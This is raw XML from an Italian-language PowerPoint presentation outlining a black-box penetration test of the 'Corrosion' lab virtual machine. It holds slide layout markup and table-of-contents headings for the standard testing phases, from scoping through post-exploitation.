          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege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Escalation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Mantaining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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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8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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="325204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Target Scoping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Segnaposto testo 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B979B1A2-164D-B8EA-C1CB-0CA455AF57AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2203767" y="2271606"/>
            <a:ext cx="7891364" cy="2071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n-lt"/>
              </a:rPr>
              <a:t>Scope dell’analisi circoscritto alla sola macchina virtuale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Corrosion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: 2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+mn-lt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n-lt"/>
              </a:rPr>
              <a:t>Testing di tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Black box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+mn-lt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n-lt"/>
              </a:rPr>
              <a:t>Produzione di un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Testing Report</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> in cui vi sono elencate le vulnerabilità riscontrate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29937418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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614266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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="136095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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="1348172"/>
            <a:ext cx="2611973" cy="236512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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C4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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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3" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege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Escalation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Mantaining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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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889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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6142669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13064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665"/>
            <a:ext cx="2611973" cy="236512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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="136095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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253" y="3859506"/>
            <a:ext cx="2611973" cy="230096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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="1348172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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C4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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173"/>
            <a:ext cx="2611973" cy="2365121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E8B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112"/>
            <a:ext cx="12192000" cy="672247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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
